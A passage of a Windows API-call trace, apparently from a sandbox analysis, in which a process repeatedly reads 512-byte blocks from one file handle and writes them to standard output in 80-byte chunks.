[0162.975] WriteFile (in: hFile=0x50, 
lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.976] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.976] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] GetFileType (hFile=0x50) returned 0x1 [0162.976] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.976] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 
[0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.977] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.977] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] GetFileType (hFile=0x50) returned 0x1 [0162.977] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.977] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: 
lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.978] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.978] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.978] GetFileType (hFile=0x50) returned 0x1 [0162.978] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0162.978] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 
[0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] GetFileType (hFile=0x50) returned 0x1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.979] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.979] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.979] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 
[0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] GetFileType (hFile=0x50) returned 0x1 [0162.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.980] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0162.981] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.981] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] GetFileType (hFile=0x50) returned 0x1 [0162.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.981] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.982] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.982] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType 
(hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.983] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.983] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, 
lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 